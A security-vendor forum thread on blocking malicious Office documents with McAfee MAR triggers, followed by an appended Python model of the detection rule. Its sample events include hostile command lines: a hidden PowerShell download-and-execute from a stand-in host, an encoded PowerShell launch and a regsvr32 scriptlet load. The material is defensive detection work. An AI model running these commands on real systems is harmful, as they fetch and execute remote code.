Integrating TIE Reputations into MAR

Hello,

We recently implemented TIE and MAR into our environment. TIE's reputation building has been very useful, but we have run into one major roadblock: ENS ATP being unable to block MANUALLY IMPORTED REPUTATIONS of .PDF or .DOCX files. 

Our SOC typically will find known malicious files, so our assumption was that we could input all proper hash values of the file and have the ENS ATP module block these files from being run. After talking with McAfee Support, I was told this wasn't possible (we would have to use ATD to sandbox the files, then, based on ATD's findings, it could block).

So my thought was: Can I create a collector that somehow pulls in TIE reputations? If so, I could make a trigger that says "If TIE reputation is KNOWN MALICIOUS, then REMOVE FILE". From brief testing, I am able to block .PDF and .DOCX files with MAR, so this could be the solution to our problem.

Maybe there's an easier way? Maybe someone else has already found a way to do this? We are just looking to fully utilize our new products.

5 Replies
malware-alerts
Reliable Contributor

Re: Integrating TIE Reputations into MAR

Hi Brett,

Did you get any input on this one? I'd be curious to know if you were able to achieve what you're trying to achieve.

Let me know.

Thanks

Re: Integrating TIE Reputations into MAR

Hi.

Unfortunately, I have not received any information. I have a case open with McAfee Enterprise Support regarding MAR triggers in general, so hopefully I can pose this question to the Support representatives and get some guidance. Will report back any further info!

Re: Integrating TIE Reputations into MAR

TIE only works with PE files at the client level, so it won't be able to help.

About the only way to do what you are wanting is through a script reaction utilizing the APIs. It probably isn't the best solution.

Your best bet is to use MAR to block the behavior of the macros with Triggers, so blocking Office from executing cmd, powershell, regsvr32, mshta, wscript, etc. If you find false positives in your environment, whitelist by cmdline. Taking this approach, you protect yourself from the known and the unknown. Be sure to watch dropped files with WMI executions, scheduled task runs and registry Run/RunOnce as well, through correlation rules.

Not the answer you wanted I'm sure but hopefully helpful. 

Re: Integrating TIE Reputations into MAR

Hi Dave,

I'm currently playing around with MAR triggers to block Office from executing cmd, powershell and such. I don't want to block them right away, but just report on them first to see what kind of impact that will have. Once I find the false positives, I'm not sure how I would exclude them from the triggers. Do you have an example of how you'd whitelist by cmdline, as you're suggesting?
I haven't really seen a way to exclude stuff from MAR triggers.

Thanks.

Re: Integrating TIE Reputations into MAR

Sure... for example, you might say:

Process name equals "cmd.exe" and Process parentname equals "winword.exe" and Process cmdline not contains "IKnowThisIsNormal"

You can also do "Process parent_cmdline not contains" as well, or the various other parameters.
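The trigger logic discussed in the two replies above (Office parent spawning cmd/powershell/regsvr32/mshta/wscript, with a "cmdline not contains" allow-list to suppress known-good cases, run in report mode before block mode) as an added, stand-alone example. This is not McAfee's code and not MAR's query language or API; the field names, process lists, allow-list token and sample events are assumptions constructed for illustration, and it only models how such a rule evaluates.

```python
"""
Added example (not McAfee's code, not MAR's query language): a stand-alone
model of "Process name equals <child> and Process parentname equals <office>
and Process cmdline not contains <token>", evaluated over constructed events.
"""
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Office parents that should not normally launch shells or script hosts (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Children the reply suggests blocking when the parent is Office (assumed list).
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "regsvr32.exe",
                       "mshta.exe", "wscript.exe", "cscript.exe"}

# "whitelist by cmdline": any command line containing one of these substrings is
# treated as known-good. The token is the placeholder used in the reply.
ALLOWED_CMDLINE_TOKENS: Tuple[str, ...] = ("IKnowThisIsNormal",)


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record, modelled on the fields named in the thread."""
    name: str            # image name or full path of the new process
    parent_name: str     # image name or full path of the parent
    cmdline: str         # command line of the new process
    parent_cmdline: str = ""


def _basename(image: str) -> str:
    """Normalise 'C:\\Windows\\System32\\CMD.EXE' to 'cmd.exe' (Windows is case-insensitive)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def matches_trigger(ev: ProcessEvent,
                    allowed: Iterable[str] = ALLOWED_CMDLINE_TOKENS) -> bool:
    """True when the event should fire: suspicious child, Office parent,
    and no allow-listed token anywhere in the child's command line."""
    if _basename(ev.name) not in SUSPICIOUS_CHILDREN:
        return False
    if _basename(ev.parent_name) not in OFFICE_PARENTS:
        return False
    cmd = ev.cmdline.lower()
    # The allow-list is a plain substring test, exactly like "not contains".
    return not any(tok.lower() in cmd for tok in allowed)


def evaluate(events: Iterable[ProcessEvent],
             mode: str = "report") -> List[Tuple[ProcessEvent, str]]:
    """Run the trigger over a stream of events. 'report' only flags matches,
    which is how the thread suggests tuning before switching to 'block'."""
    if mode not in ("report", "block"):
        raise ValueError("mode must be 'report' or 'block'")
    action = "KILL_PROCESS" if mode == "block" else "ALERT"
    return [(ev, action) for ev in events if matches_trigger(ev)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\cmd.exe", "WINWORD.EXE",
                 "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA"),
    ProcessEvent("powershell.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient)"
                 ".DownloadString('http://192.0.2.10/a')"),
    ProcessEvent("regsvr32.exe", "winword.exe",
                 "regsvr32.exe /s /i:payload.sct scrobj.dll"),
    # Known-good macro calling an approved batch file; the allow-list suppresses it.
    ProcessEvent("cmd.exe", "winword.exe",
                 r'cmd.exe /c "C:\Tools\export.bat" IKnowThisIsNormal'),
    # Same child, non-Office parent: outside the trigger's scope.
    ProcessEvent("cmd.exe", "explorer.exe", "cmd.exe /k"),
    # Office spawning a child that is not on the list.
    ProcessEvent("splwow64.exe", "winword.exe", "splwow64.exe 12288"),
]


if __name__ == "__main__":
    for ev, action in evaluate(SAMPLE_EVENTS, mode="report"):
        print(f"{action}: {_basename(ev.parent_name)} -> {_basename(ev.name)} :: {ev.cmdline}")
```

Running it in report mode flags the first three events and suppresses the fourth. One caveat worth keeping in mind with a substring allow-list: anything an attacker can get into the command line (for instance a trailing `REM IKnowThisIsNormal` after a `cmd.exe /c` payload) also satisfies "not contains", so prefer matching the exact approved command line or the parent_cmdline rather than a short token, and keep the rule in report mode until the suppressions are known.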
